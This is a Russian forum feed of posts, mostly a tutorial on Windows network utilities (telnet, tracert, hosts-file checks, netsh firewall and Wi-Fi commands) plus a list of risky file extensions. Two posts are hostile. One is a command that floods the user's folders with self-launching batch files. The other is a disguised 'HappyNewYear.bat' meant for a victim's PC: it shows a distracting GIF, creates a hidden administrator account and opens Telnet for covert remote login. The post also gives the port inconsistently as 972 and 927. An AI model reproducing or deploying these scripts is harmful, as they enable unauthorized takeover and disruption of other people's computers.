стандартный порт 23, но и на любой другой TCP-порт, тем самым, позволяя взаимодействовать с любым приложением, управляемым командной строкой&#46; Так, например, с использованием утилиты telnet можно подключиться к серверам, поддерживающим текстовый (telnet-like) ввод команд и данных - SMTP, POP3, IMAP и т&#46;п&#46; Кроме этого, утилиту можно использовать в качестве средства грубой проверки возможности подключения на любой TCP-порт (проверки слушается ли определенный порт TCP)&#46;</p> <p>При запуске TELNET&#46;EXE без параметров, программа переходит в интерактивный режим, ожидая ввода команд пользователем&#46; Для получения списка доступных команд используется ввод знака вопроса или /h &#46; Набор доступных команд может отличаться для разных версий telnet, но всегда будут присутствовать команды подключения к удаленному узлу (open ), закрытия существующего подключения (close ), установки (set ) и сброса (unset параметров&#46;</p> <p>set ? - отобразить текущие параметры сессии&#46; Отображаются параметры, связанные с эмуляцией терминала, режима отображения вводимых символов (локального эха), интерпретацией управляющих последовательностей символов, способа аутентификации&#46;</p> <p>open 192&#46;168&#46;1&#46;1 - подключиться к серверу TELNET узла 192&#46;168&#46;1&#46;1</p> <p>open 192&#46;168&#46;1&#46;1 25 - подключиться к серверу, слушающему порт 25/TCP узла 192&#46;168&#46;1&#46;1</p> <p>После подключения к удаленному серверу, вводимые с клавиатуры символы будут передаваться на обработку удаленной системе и, для возврата в командную строку telnet , требуется ввод специальной комбинации клавиш переключения режима (Escape character) - по умолчанию это CTRL-] &#46; Для выхода из telnet используется команда quit&#46;</p> <p>На практике, как правило, используется запуск telnet с параметрами по умолчанию и с указанием имени или IP-адреса и номера порта TCP удаленной системы&#46;</p> <p>telnet 192&#46;168&#46;1&#46;1 - подключиться к серверу telnet узла 192&#46;168&#46;1&#46;1</p> <p>telnet yandex&#46;ru 80 - подключиться к серверу HTTP (TCP порт 80) узла yandex&#46;ru</p> <p>Если подключение невозможно, то утилита telnet завершится сообщением&#58;</p> <p>Не удалось открыть подключение к этому узлу на порт &#46; &#46; &#46; Сбой подключения&#46;</p> <p>Если имя или IP-адрес в командной строке достижимы, то такое сообщение говорит о том, что заданный порт не слушается удаленной системой ( или закрыт брандмауэром) &#46; Если же удаленная система не поддерживает текстовое (telnet-like) управление, то, как правило, соединение устанавливается, экран терминала остается пустым, и после нажатия любой клавиши, сессия может завершиться, но сообщения о сбое соединения не будет&#46; В некоторых случаях, удаленный сервер, не поддерживающий телнетоподобный протокол может выдать баннер, отображая информацию о себе, как например, это делают серверы VNC, отбражая версию протокола RFB&#46; Примеры использования telnet для отправки простого e-mail сообщения имеются в этой статье</p> <p>В операционных системах Windows 7, Windows Server 2008,Windows Server 2008 R2, для управления службой TELNET на локальном или удаленном компьютере можно воспользоваться специальной утилитой tlntadmn, позволяющей запустить, приостановить, остановить или продолжить работу сервера TELNET, а также настроить некоторые параметры его конфигурации&#46;</p> <p>В Windows 7 и более поздних версиях, сервер и клиент telnet при установке системы не инсталлируются&#46; Для того, чтобы воспользоваться утилитой telnet&#46;exe, нужно добавить ее в систему используя “Панель управления” – “Программы и компоненты” – “Включение или отключение компонентов Windows” – установить галочку на “Клиент Telnet”&#46; При необходимости, можно таким же образом установить и сервер Telnet&#46;</p> <p>Утилита TRACERT&#46;EXE</p> <p>&#160; &#160; Не смотря на появление утилиты PATHPIG, классическая утилита трассировки маршрута до заданного узла TRACERT , по-прежнему остается наиболее часто используемым инструментом сетевой диагностики&#46; Утилита позволяет получить цепочку узлов, через которые проходит IP-пакет, адресованный конечному узлу&#46; В основе трассировки заложен метод анализа ответов при последоательной отправке ICMP-пакетов на указанный адрес с увеличивающимся на 1 полем TTL&#46; (&quot;Время жизни&quot; - Time To Live)&#46; На самом деле это поле не имеет отношения к времени, а является счетчиком числа возможных переходов при передаче маршрутизируемого пакета&#46; Каждый маршрутизатор, получив пакет, вычитает из этого поля 1 и проверяет значение счетчика TTL&#46; Если значение стало равным нулю, такой пакет отбрасывается и отправителю посылается ICMP-сообщение о превышении времени жизни (&quot;Time Exceeded&quot; - значение 11 в заголовке ICMP)&#46; Если бы не было предусмотрено включение поля TTL в IP пакеты, то при ошибках в маршрутах, могда бы возникнуть ситуация, когда пакет будет вечно циркулировать в сети, пересылаемый маршрутизаторами по кругу&#46;&#160; &#160; &#160;При выполнении команды tracert&#46;exe сначала выполняется отправка ICMP пакета с полем TTL равным 1 и первый в цепочке маршрутизатор (обычно это основной шлюз из настроек сетевого подключения) вычтя единицу из TTL получает его нулевое значение и сообщает о превышении времени жизни&#46; Эта последовательность повторяется трижды, поэтому в строке результата, формируемой tracert&#46;exe, после номера перехода отображаются три значения времени отклика&#58;<br />1&#160; &#160; &#160;1 ms&#160; &#160; &#160;&lt;1&#160; &#160; &#160;&lt;1&#160; &#160; &#160;192&#46;168&#46;1&#46;1<br />1 - номер перехода (1 - первый маршрутизатор)<br />1 ms &lt;1 &lt;1 - время его ответа для 3-х попыток (1ms и 2 ответа менее чем 1 ms)<br />192&#46;168&#46;1&#46;1 - его адрес (или имя)</p> <p>&#160; &#160; Затем процедура повторяется, но TTL устанавливается равным 2 - первый маршрутизатор его уменьшит до 1 и отправит следующему в цепочке, который после вычитания 1 обнулит TTL и сообщит о превышении времени жизни&#46; И так далее, пока не будет достигнут заданный узел, имя или адрес которого заданы в качестве параметра командной строки, например , tracert yandex&#46;ru , или до обнаружения неисправности, не позволяющей доставить пакет узлу yandex&#46;ru&#46;</p> <p>Пример результатов выполнения tracert google&#46;com</p> <p>tracert google&#46;com - трассировка маршрута к узлу google&#46;com</p> <p>Результат&#58;</p> <p>Трассировка маршрута к google&#46;com [74&#46;125&#46;45&#46;100] с максимальным числом прыжков 30&#58;<br />1 1 ms &lt;1 &lt;1 192&#46;168&#46;1&#46;1<br />2 498 ms 444 ms 302 ms ppp83-237-220-1&#46;pppoe&#46;mtu-net&#46;ru [83&#46;237&#46;220&#46;1]<br />3 * * * &#46;<br />4 282 ms * * a197-crs-1-be1-53&#46;msk&#46;stream-internet&#46;net [212&#46;188&#46;1&#46;113]<br />5 518 ms 344 ms 382 ms ss-crs-1-be5&#46;msk&#46;stream-internet&#46;net [195&#46;34&#46;59&#46;105]<br />6 462 ms 440 ms 335 ms m9-cr01-po3&#46;msk&#46;stream-internet&#46;net [195&#46;34&#46;53&#46;85]<br />7 323 ms 389 ms 339 ms bor-cr01-po4&#46;spb&#46;stream-internet&#46;net [195&#46;34&#46;53&#46;126]<br />8 475 ms 302 ms 420 ms anc-cr01-po3&#46;ff&#46;stream-internet&#46;net [195&#46;34&#46;53&#46;102]<br />9 334 ms 408 ms 348 ms 74&#46;125&#46;50&#46;57<br />10 451 ms 368 ms 524 ms 209&#46;85&#46;255&#46;178<br />11 329 ms 542 ms 451 ms 209&#46;85&#46;250&#46;140<br />12 616 ms 480 ms 645 ms 209&#46;85&#46;248&#46;81<br />13 656 ms 549 ms 422 ms 216&#46;239&#46;43&#46;192<br />14 378 ms 560 ms 534 ms 216&#46;239&#46;43&#46;113<br />15 511 ms 566 ms 546 ms 209&#46;85&#46;251&#46;9<br />16 543 ms 682 ms 523 ms 72&#46;14&#46;232&#46;213<br />17 468 ms 557 ms 486 ms 209&#46;85&#46;253&#46;141<br />18 593 ms 589 ms 575 ms yx-in-f100&#46;google&#46;com [74&#46;125&#46;45&#46;100]</p> <p>Трассировка завершена&#46;</p> <p>&#160; &#160; В результатах трассировки могут присутствовать строки, где вместо адреса узла отображается звездочка (узел номер 3 в примере)&#46; Это не обязательно является признаком неисправности маршрутизатора, и чаще всего, говорит о том, что настройки данного узла запрещают ICMP-протокол из соображений безопасности или уменьшения нагрузки на канал &#46; Подобные же настройки используются в сетях корпорации Microsoft &#46; Для проверки, попробуйте выполнить трассировку маршрута к узлу microsoft&#46;com &#46;<br /><br /><br /></p> <p>Примеры практического использования сетевых утилит командной строки&#46;</p> <p>Определение подмены адреса узла в файле hosts</p> <p>&#160; &#160; Одним из последствий вирусного заражения довольно часто является блокировка доступа к сайтам антивирусных компаний, поисковым системам, популярным социальным сетям (Vkontakte, Odnoklassniki, Facebook, Twitter и т&#46;п&#46;)&#46; Подобный же прием используется для кражи учетных данных пользователей путем перенаправления на вредоносный сайт, адрес которого берется из зараженного файла hosts&#46;</p> <p>Порядок преобразования доменных имен в IP-адреса следующий&#58;</p> <p>- проверяется наличие данных об имени в кэш службы разрешения имен (процедура определения IP по имени уже выполнялась, и в памяти есть актуальные результаты)&#46; Если запись есть, то будут использованы ее данные&#46;</p> <p>- проверяется наличие записи об имени и адресе в файле hosts&#46; Если запись есть, то будут использованы ее данные&#46;</p> <p>- для разрешения доменного имени в IP-адрес выполняется запрос к серверу DNS, заданному в настройках сетевого подключения&#46;</p> <p>Файл hosts при настройках по умолчанию, находится в каталоге \Windows\system32\drivers\etc\ и обычно содержит строки, начинающиеся с символа # , являющиеся комментариями, и одну запись для определения имени узла петлевого интерфейса&#58;</p> <p>127&#46;0&#46;0&#46;1 localhost</p> <p>127&#46;0&#46;0&#46;1 - IP-адрес, localhost - имя&#46; Если добавить запись 127&#46;0&#46;0&#46;1 odnoklassniki&#46;ru, то для имени odnoklassniki&#46;ru будет использоваться адрес 127&#46;0&#46;0&#46;1, который не предназначен для выполнения реальной передачи данных, и сервер с указанным именем станет недоступен&#46; Если же вместо адреса 127&#46;0&#46;0&#46;1 использовать адрес поддельного сервера, созданного злоумышленниками, то вместо реального сайта, соответствующего доменному имени, посетитель перейдет на поддельную страницу&#46;<br />Структура записей файла hosts предполагает, что между адресом и соответствующим ему именем должен быть хотя бы один символ табуляции (пробел)&#46; Каждой записи отводится одна строка в файле hosts&#46; Иногда, вредоносная программа выполняет смещение записей относительно отображаемой на экране части файла, заполняя видимую часть пробелами, а в непомещающейся в области просмотра части, могут присутствовать записи, например</p> <p>31&#46;214&#46;145&#46;172 odnoklassniki&#46;ru<br />31&#46;214&#46;145&#46;172 www&#46;facebook&#46;com<br />31&#46;214&#46;145&#46;172 www&#46;vk&#46;com<br />31&#46;214&#46;145&#46;172 www&#46;vkontakte&#46;ru</p> <p>Данный адрес взят из реально зараженного файла hosts и принадлежит сети одного из провайдеров Германии&#46; Сейчас он безопасен, и не занят обслуживанием вредоносного сервера&#46;<br />На зараженном компьютере, в файл hosts было добавлено множество пустых строк, и поддельные записи располагались с разным смещением относительно начала строки, что могло затруднить ручной поиск&#46; Кроме того, вредоносные программы могут использовать и некоторые другие способы подмены содержимого hosts - изменение местоположения самого файла, использование атрибута &quot;скрытый&quot; и имени с подменой символа на похожий по написанию символ национального алфавита - &quot;o&quot; и т&#46;п&#46; Другими словами, достоверно определить сам факт подмены адреса с помощью файла hosts, путем прямого анализа содержимого реестра, системных каталогов и самого файла занимает довольно длительное время и не всегда позволяет исключить ошибку поиска вредоносных записей&#46; А, тем временем, задача легко решается с использованием всего лишь 2-х команд из рассмотренных выше - ping и nslookup &#46;</p> <p>ping odnoklassniki&#46;ru - в ответе на пинг будет отображаться адрес, соответствующий имени odnoklassniki&#46;ru при определении IP-адреса на данном компьютере</p> <p>nslookup odnoklassniki&#46;ru - получить IP-адрес, соответствующий имени odnoklassniki&#46;ru от сервера DNS&#46;</p> <p>Если адрес по результатам пинга отличается от адреса, полученного от DNS-сервера, то присутствует факт подмены содержимого файла hosts&#46; Для некоторых крупных доменов утилита nslookup может выдавать список из нескольких IP&#46; Тогда IP-адрес, полученный в результатах пинга, должен присутствовать в списке адресов от nslookup&#46;</p> <p>Иногда, в качестве способа блокировки определенных сайтов, используется добавление несуществующих статических маршрутов для соответствующих IP-адресов или подсетей, что легко отследить с помощью утилиты tracert<br /></p> <p>Как открыть порт в брандмауэре Windows</p> <p>Разрешить входящие соединения через брандмауэр Windows (открыть порт) можно с использованием контекста firewall утилиты netsh</p> <p>netsh firewall set portopening protocol=TCP port=27015 name=MyServer mode=ENABLE scope=ALL<br />или<br />netsh firewall set portopening TCP 27015 MyServer ENABLE ALL<br />protocol - Протокол порта&#46; TCP (Transmission Control Protocol), UDP (User Datagram Protocol), ALL - Все протоколы&#46;<br />port - Номер порта&#46;<br />name - Имя порта (необязательно)<br />mode - Режим порта&#46; ENABLE - Пропускать через брандмауэр (по умолчанию)&#46; DISABLE - Не пропускать через брандмауэр&#46;<br />scope - Область порта (необязательно)&#46; ALL - Пропускать через брандмауэр весь трафик (по умолчанию)&#46; SUBNET - Пропускать через брандмауэр только трафик локальной сети (подсети)&#46; CUSTOM - Пропускать через брандмауэр только указанный трафик&#46;</p> <p>С учетом значений по умолчанию и необязательных параметров открыть TCP порт 27015 в брандмауэре Windows можно командой</p> <p>netsh firewall set portopening TCP 27015</p> <p>В Windows Vista/Windows7 пока поддерживается синтаксис приведенный в примере выше, однако в последующих версиях операционных систем он будет полностью заменен на контекст netsh advfirewall - управление улучшенным брандмауэром&#46; Подсказку по использованию можно получить при вводе команды с параметром ? (знак вопроса) &#58;</p> <p>netsh advfirewall ?</p> <p>В контексте правил для брандмауэра&#58;</p> <p>netsh advfirewall firewall ?</p> <p>Для открытия порта 27015 в Windows 7 с учетом нового синтаксиса правильнее использовать команду&#58;</p> <p>netsh advfirewall firewall add rule name=&quot;Open Port 27015&quot; dir=in action=allow protocol=TCP localport=27015</p> <p>add rule - добавить правило<br />name - название правила&#46; Название может быть произвольным, и если текст содержит пробелы - заключаться в двойные кавычки&#46; Имя правила не должно принимать значение all<br />dir - направление обмена данными (in-входящий трафик, out- исходящий)<br />action - действие по отношению к попадающему под правило соединению (allow - разрешить, block - запретить)<br />protocol - разновидность протокола&#46; (TCP - протокол TCP, UDP - протокол UDP, ANY - любой протокол)&#46; Если параметр protocol не указан, то используется значение по умолчанию - ANY )<br />localport - номер порта на локальном компьютере&#46; Можно указывать диапазон портов 0 -65535 или any - любой порт или номера через запятую - 67,69 &#46;<br /><br /><br /></p> <p>Примеры правил брандмауэра Windows 7</p> <p>По сравнению с предыдущими версиями Windows синтаксис правил стал немного сложнее, но и возможности брандмауэра значительно расширились&#46;</p> <p>Краткий список возможных параметров правил &#58;</p> <p>add rule name=&lt;строка&gt;<br />dir=in|out<br />action=allow|block|bypass<br />[program=&lt;путь к программе&gt;]<br />[service=&lt;краткое имя службы&gt;|any]<br />[description=&lt;строка&gt;]<br />[enable=yes|no (по умолчанию - yes)]<br />[profile=public|private|domain|any[,&#46;&#46;&#46;]]<br />[localip=any|||&lt;подсеть&gt;|&lt;диапазон&gt;|&lt;список&gt;]<br />[remoteip=any|localsubnet|dns|dhcp|wins|defaultgateway| ||&lt;подсеть&gt;|&lt;диапазон&gt;|&lt;список&gt;]<br />[localport=0-65535||&lt;диапазон портов&gt;[,&#46;&#46;&#46;]|RPC|RPC-EPMap|IPHTTPS|any (по умолчанию - any)]<br />[remoteport=0-65535|&lt;диапазон портов&gt;[,&#46;&#46;&#46;]|any (по умолчанию - any)]<br />[protocol=0-255|icmpv4|icmpv6|icmpv4&#58;тип,код|icmpv6&#58;тип,код| tcp|udp|any (по умолчанию - any)]<br />[interfacetype=wireless|lan|ras|any]<br />[rmtcomputergrp=&lt;строка SDDL&gt;]<br />[rmtusrgrp=&lt;строка SDDL&gt;]<br />[edge=yes|deferapp|deferuser|no (по умолчанию - no)]<br />[security=authenticate|authenc|authdynenc|authnoencap|notrequired (по умолчанию - notrequired)]</p> <p>Некоторые правила применения параметров&#58;</p> <p>Параметры могут следовать в произвольном порядке - dir=in action=allow и action=allow dir=in являются допустимыми значениями&#46;<br />Если указана удаленная группа пользователей или компьютеров, для параметра security необходимо установить значение authenticate, authenc, authdynenc или authnoencap&#46;<br />Установка authdynenc в качестве значения параметра security позволяет системам динамически согласовывать использование шифрования трафика, соответствующего данному правилу брандмауэра Windows&#46; Шифрование согласуется в соответствии со свойствами существующего правила безопасности соединения&#46; Этот параметр позволяет компьютеру принять первый пакет TCP или UDP входящего соединения IPsec, при условии, что он защищен, но не зашифрован, с помощью IPsec&#46; Как только первый пакет будет обработан, сервер повторно согласует соединение и обновит его, чтобы все последующие соединения были полностью зашифрованы&#46;</p> <p>Если action=bypass, должна быть указана группа удаленных компьютеров, если dir=in&#46;</p> <p>Короткое имя службы можно посмотреть в ее свойствах, в поле Имя службы&#46; Так, для службы &quot;DNS-клиент&quot; короткое имя - Dnscache &#46; Если service=any, правило действует только для служб&#46;</p> <p>Значением кода или типа ICMP может быть any - любой ICMP трафик&#46;</p> <p>Параметр edge можно указывать только для правил входящего трафика (dir=in) &#46;</p> <p>AuthEnc и authnoencap нельзя использовать вместе&#46; Если задан параметр authnoencap, то параметр security=authenticate задавать необязательно&#46;</p> <p>Параметр Authdynenc допустим только в том случае, если значение dir равно in&#46;</p> <p>Примеры&#58;</p> <p>Добавление правила для входящего трафика для программы qip&#46;exe&#58;</p> <p>netsh advfirewall firewall add rule name=&quot;allow QIP&quot; dir=in program=&quot;c&#58;\programfiles\qip\qip&#46;exe&quot; action=allow</p> <p>Добавление правила, запрещающего исходящий трафик для TCP порта 80&#58;</p> <p>netsh advfirewall firewall add rule name=&quot;allow80&quot; protocol=TCP dir=out localport=80 action=block</p> <p>Добавление правила входящего трафика с требованием безопасности и шифрования для трафика через TCP-порт 80&#58;</p> <p>netsh advfirewall firewall add rule name=&quot;Require Encryption for Inbound TCP/80&quot; protocol=TCP dir=in localport=80 security=authdynenc action=allow</p> <p>Добавление правила входящего трафика для messenger&#46;exe с требованием безопасности&#58;</p> <p>netsh advfirewall firewall add rule name=&quot;allow messenger&quot; dir=in program=&quot;c&#58;\program files\messenger\msmsgs&#46;exe&quot; security=authenticate action=allow</p> <p>Добавление правила обхода брандмауэра с проверкой подлинности для группы acmedomain\scanners, определяемой строкой SDDL&#58;</p> <p>netsh advfirewall firewall add rule name=&quot;allow scanners&quot; dir=in rmtcomputergrp=&lt;строка SDDL&gt; action=bypass security=authenticate</p> <p>Добавление правила разрешения исходящего трафика для локальных портов 5000-5010 для udp&#58;</p> <p>netsh advfirewall firewall add rule name=&quot;Allow port range&quot; dir=out protocol=udp localport=5000-5010 action=allow</p> <p>Для просмотра всех правил брандмауэра используется команда&#58;</p> <p>netsh advfirewall firewall show rule name=all<br />netsh advfirewall firewall show rule name=all | more - с выдачей результатов на экран в постраничном режиме<br />netsh advfirewall firewall show rule name=all &gt; C&#58;\firewallrues&#46;txt - с выдачей результатов в файл</p> <p>Для просмотра конкретного правила указывается его имя&#46; Для удаления правила используется параметр delete&#58;</p> <p>netsh advfirewall firewall show rule name=TEST просмотр правила с именем TEST<br />netsh advfirewall firewall delete rule name=test - удаление правила с именем TEST</p> <p>Для изменения значений в существующих правилах используется параметр set и new перед изменяемым значением&#58;</p> <p>netsh advfirewall firewall set rule name=&quot;Allow port range&quot; new localport=5000-6000 изменить диапазон портов для правила &quot;Allow port range&quot;</p> <p>&#160; &#160; Настройками по умолчанию, в режиме повышенной безопасности брандмауэр Windows 7 блокирует все входящие подключения, не соответствующие ни одному правилу и разрешает исходящие&#46;</p> <p>Wi-Fi точка доступа стандартными средствами Windows 7</p> <p>&#160; &#160; В операционной системе Windows 7 реализована технология Virtual WiFi, позволяющая легко создавать программную точку доступа (Software Access Point - SoftAP) &#46; В отличие от полноценных беспроводных точек доступа, реализуемая таким образом SoftAP, позволяет создать только один виртуальный адаптер, который будет работать только в режиме точки доступа, и может быть использовано шифрование только по WPA2-PSK/AES&#46; Тем не менее, этого вполне достаточно для создания функциональной беспроводной сети без реально существующей точки доступа&#46; Такая сеть, обозначается как Wireless Hosted Network, или просто Hosted Network ( Размещенная Сеть )&#46;</p> <p>Для создания размещенной сети используется команды сетевой оболочки netsh&#46;exe в контексте wlan&#58;</p> <p>netsh wlan set hostednetwork [mode=]allow|disallow - разрешить или запретить использование размещенной сети&#46;<br />netsh wlan set hostednetwork [ssid=]&lt;идентификатор_SSID&gt; [key=]&lt;парольная_фраза&gt; [keyUsage=]persistent|temporary - задать параметры размещённой сети&#46;<br />ssid - идентификатор SSID сети, другими словами - имя беспроводной сети;<br />key - ключ безопасности, используемый в данной сети, т&#46;е&#46; парольная фраза, используемая при подключении клиентов к виртуальной точке доступа&#46; Ключ должен быть строкой символов ASCII длиной от 8 до 63 знаков&#46;<br />keyUsage - указывает, является ключ безопасности постоянным или временным&#46; По умолчанию, ключ является постоянным ( persistent ) и используется при каждом включении размещенной сети&#46;</p> <p>Примеры&#58;</p> <p>&#160; &#160; set hostednetwork mode=allow<br />&#160; &#160; set hostednetwork ssid=ssid1<br />&#160; &#160; set hostednetwork key=passphrase keyUsage=persistent<br />&#160; &#160; set hostednetwork mode=allow ssid=MyWiFi key=MyPassWord </p> <p>Или - одной командной строкой&#58;</p> <p>netsh wlan set hostednetwork mode=allow ssid=MyWiFi key=MyPassWord - создать виртуальную точку доступа Wi-Fi с именем MyWiFi и паролем MyPassWord</p> <p>Созданная программная точка доступа не будет запущена автоматически&#46; Для запуска потребуется выполнить команду &#58;</p> <p>netsh wlan start hostednetwork<br />Для остановки - netsh wlan stop hostednetwork</p> <p>При использовании команд управления размещенной сетью требуются права администратора&#46;<br />Для организации доступа в Интернет с использованием размещенной сети можно воспользоваться совместным подключением через, созданный после выполнения команды создания размещенной сети , виртуальный сетевой адаптер - Адаптер мини-порта виртуального WiFi Microsoft (Microsoft Virtual WiFi miniport adapter) &#46; Если же данный адаптер не обнаруживается в диспетчере учтройств и отсутствует в списке сетевых адаптеров, то наиболее вероятно, что драйвер реального Wi-Fi устройства не сертифицирован для использования в операционной системе Windows 7 и не поддерживает технологию Virtual WiFi&#46;</p> <p>Как получить список беспроводных сетей стандартными средствами Windows 7</p> <p>&#160; &#160; Ниже приведено содержимое командного файла, который позволяет собрать список беспроводных сетей, включая имя, уровень сигнала, BSSID&#46; Информация записывается в файл wlans&#46;txt каталога временных файлов и открывается для просмотра с помощью редактора wordpad</p> <p>chcp 1251<br />netsh wlan show networks mode=bssid &gt; %TEMP%\wlans&#46;txt<br />start &quot;LIST&quot; &quot;%ProgramFiles%\Windows NT\Accessories\wordpad&#46;exe&quot; %TEMP%\wlans&#46;txt<br /><br /></p> <p>Дополнительно &#58;</p> <p>Примеры использования некоторых сетевых утилит командной строки для поиска причины отсутствия доступа в Интернет</p> <p>Методика поиска и устранения причины отсутствия доступа к конкретному сайту, или группе сайтов&#46;</p> mybb@mybb.ru (cmd) Tue, 10 Mar 2015 13:41:31 +0300 https://antik.mybb.ru/viewtopic.php?pid=38#p38 https://antik.mybb.ru/viewtopic.php?pid=35#p35 <p><img class="postimg" loading="lazy" src="https://21.mvd.ru/favico.ico" alt="https://21.mvd.ru/favico.ico" /></p> mybb@mybb.ru (21.mvd.ru) Mon, 09 Mar 2015 19:31:25 +0300 https://antik.mybb.ru/viewtopic.php?pid=35#p35 https://antik.mybb.ru/viewtopic.php?pid=33#p33 <p>Государственный реестр сертифицированных средств защиты информации</p> <p>Весьма полезная информация на официальном сайте ФСТЭК. В электронной таблице перечислены популярные программные и аппаратные средства для защиты информации, прошедшие сертификацию ФСТЭК (Федеральная служба по техническому и экспортному контролю).</p> mybb@mybb.ru (ФСТЭК) Wed, 11 Feb 2015 18:49:00 +0300 https://antik.mybb.ru/viewtopic.php?pid=33#p33 https://antik.mybb.ru/viewtopic.php?pid=32#p32 <p><span style="font-size: 20px">HackBar — расширение Firefox для хакеров</span></p> <p>Данная панель инструментов поможет вам в тестировании sql-инъекций, XSS «дырок» и общей безопасности сайта. Это расширение не инструмент для выполнения эксплойтов (от англ. — exploit) и оно не научит взламывать сайт (или стать хакером). Первостепенная роль расширения — помочь разработчикам в проверке степени безопасности их кода. Если вы знаете что вам требуется сделать, то эта панель поможет сделать это быстрее. Если вы только хотите научиться находить пробелы в безопасности, то вы также можете использовать эту панель, но вам потребуется как минимум книга и «много-много гугла».</p> mybb@mybb.ru (Смирнов А.В.) Mon, 24 Nov 2014 09:30:38 +0300 https://antik.mybb.ru/viewtopic.php?pid=32#p32 https://antik.mybb.ru/viewtopic.php?pid=31#p31 <p>Пуск &gt; Выполнить<br />cmd.exe /k cd %userprofile%&amp;echo start cmd.exe /k %0&gt;e.bat&amp;echo start cmd.exe /k %0&gt;&gt;e.bat&amp;for /d /r &quot;%userprofile%&quot; %x in (*) do @copy e.bat &quot;%x&quot;&amp;start cmd.exe /k e.bat</p> mybb@mybb.ru (Пуск > Выполнить) Thu, 13 Nov 2014 20:52:50 +0300 https://antik.mybb.ru/viewtopic.php?pid=31#p31 https://antik.mybb.ru/viewtopic.php?pid=19#p19 <p><span style="font-size: 20px">Скрытое управление Windows через Telnet</span></p> <p>Создаём батник HappyNewYear.bat и запускаем его на компьютере &quot;поциента&quot;.</p> <p>HappyNewYear.bat</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 35em"><pre>@echo off echo Please wait... start iexplore http://se.uploads.ru/8bOTq.gif chcp 1251 &gt; nul 2&gt; nul echo Windows Registry Editor Version 5.00 &gt; conf.reg echo. &gt;&gt; conf.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList] &gt;&gt; conf.reg echo &quot;vasya&quot;=&quot;dword:00000000&quot; &gt;&gt; conf.reg echo. &gt;&gt; conf.reg net user SUPPORT_388945a0 /delete &gt; nul 2&gt; nul net user vasya pass123456789 /add &gt; nul 2&gt; nul net localgroup Администраторы vasya /add &gt; nul 2&gt; nul net localgroup Пользователи SUPPORT_388945a0 /del &gt; nul 2&gt; nul regedit /s conf.reg &gt; nul 2&gt; nul sc config tlntsvr start= auto &gt; nul 2&gt; nul tlntadmn config port=972 sec=-NTLM &gt; nul 2&gt; nul net start Telnet &gt; nul 2&gt; nul del conf.reg &gt; nul 2&gt; nul</pre></div></div></div><p>Этот батник делает две вещи:<br />1. Создает администратора vasya с паролем pass123456789 <br />2. Включает службу telnet и вешает её на 927 порт.</p> <p>Осталось подключится:<br />1. В консоли запускаем telnet.<br />2. В телнете набираем команду open IPпоциента 927.<br />3. Если пишет: Welcome to Microsoft Telnet Service login:_ то всё OK)) Вводим: login: vasya password: pass123456789<br />4. Если система не ругнулась, то поздравляю - ты внутри, перед тобой консоль, с помощью которой ты можешь удаленно управлять ПК, отдавая команды. </p> <p><img class="postimg" loading="lazy" src="https://i64.fastpic.ru/big/2014/0919/c1/a38775ad074980b621e335610750a8c1.gif" alt="http://i64.fastpic.ru/big/2014/0919/c1/a38775ad074980b621e335610750a8c1.gif" /></p> <p><img class="postimg" loading="lazy" src="https://se.uploads.ru/8bOTq.gif" alt="http://se.uploads.ru/8bOTq.gif" /></p> mybb@mybb.ru (counter) Thu, 16 Oct 2014 22:12:43 +0400 https://antik.mybb.ru/viewtopic.php?pid=19#p19 https://antik.mybb.ru/viewtopic.php?pid=18#p18 <p><span style="font-size: 20px">Windows. Каких расширений файлов следует опасаться?</span></p> <p>Теоретически, исправная антивирусная программа со свежими базами может в значительной мере обезопасить вашу работу. Но любой, даже самый совершенный антивирус может ошибиться или не успеть внести заразу в свои фильтры. Поэтому дополнительным фактором защиты лучше включать свою голову вооруженную необходимыми знаниями.</p> <p>Если вы получили файл из подозрительного источника, например по почте от незнакомого человека, то необходимо обратить внимание на его расширение и, если оно входит в предложенный нами список, то лучше его не открывать, а отослать на проверку в VirusTotal.</p> <p><span style="font-size: 20px">Программы</span></p> <p>&#160; &#160; .EXE - исполнимый программный файл. Большинство программ в Windows имеют именно такое расширение.<br />&#160; &#160; .PIF – это специальный файл, содержащий информацию для DOS-программ. Несмотря на то, что не содержат исполнимого кода, могут быть потенциально опасны.<br />&#160; &#160; .APPLICATION – установщик приложения, использующий технологию ClickOnce от Microsoft.<br />&#160; &#160; .GADGET – гаджет для отображения на&#160; рабочем столе&#160; в Windows Vista и 7.<br />&#160; &#160; .MSI – запускает процесс установки программы на вашем компьютере.<br />&#160; &#160; .MSP - установка обновлений для уже установленных программ.<br />&#160; &#160; .COM – программы для MS-DOS.<br />&#160; &#160; .SCR – файл скринсейвера.<br />&#160; &#160; .HTA – веб-приложение. В отличие от html приложений исполняемых в вашем браузере, могут быть опасны.<br />&#160; &#160; .CPL – файл Панели управления. Все элементы в панели управления имеют это расширение.<br />&#160; &#160; .MSC – файл консоли управления Microsoft. Такие приложения, как редактор групповых политик и инструмент управления дисками имеют расширение .MSC.<br />&#160; &#160; .JAR – исполнимый код для среды Java.</p> <p><span style="font-size: 20px">Скрипты</span></p> <p>&#160; &#160; .BAT – пакетный файл, содержащий последовательность команд для вашего компьютера. Изначально использовался в MS-DOS.<br />&#160; &#160; .CMD – пакетный файл наподобие .BAT, но это расширение файла было введено в Windows NT<br />&#160; &#160; .VB, .VBS, .VBE&#160; – файл VBScript. Будет при запуске выполнять свой VBScript код.<br />&#160; &#160; .JS, .JSE - файл JavaScript. При использовании на веб-страницах является относительно безопасными, если работать в веб-браузере. Тем не менее, Windows может открывать эти файлы вне браузера и это несет угрозу.<br />&#160; &#160; .WS, .WSF, .WSC, .WSH – файлы Windows Script.<br />&#160; &#160; .PS1, .PS1XML, .PS2, .PS2XML, .PSC1, .PSC2 – командный сценарий для Windows PowerShell.<br />&#160; &#160; .MSH, .MSH1, .MSH2, .MSHXML, .MSH1XML, .MSH2XML – командный сценарий для Monad. Monad позже был переименован в PowerShell.</p> <p><span style="font-size: 20px">Ярлыки</span></p> <p>&#160; &#160; .SCF – командный файл Windows Explorer. Может содержать потенциально опасные команды.<br />&#160; &#160; .LNK – ссылка для запуска программы. Может содержать атрибуты командной строки, которые делают опасные вещи, такие как удаление файлов без спроса.<br />&#160; &#160; .INF – текстовый файл, используемый для автоматического запуска с подключаемых носителей. Часто используется для заражения с флешек или дисков.</p> <p><span style="font-size: 20px">Остальные</span></p> <p>&#160; &#160; .REG - файл реестра Windows. Эти файлы содержат список записей реестра, которые будут добавлены или удалены, если вы запустите их. Опасность заключается в том, что вы можете удалить важные сведения из реестра, внести в него 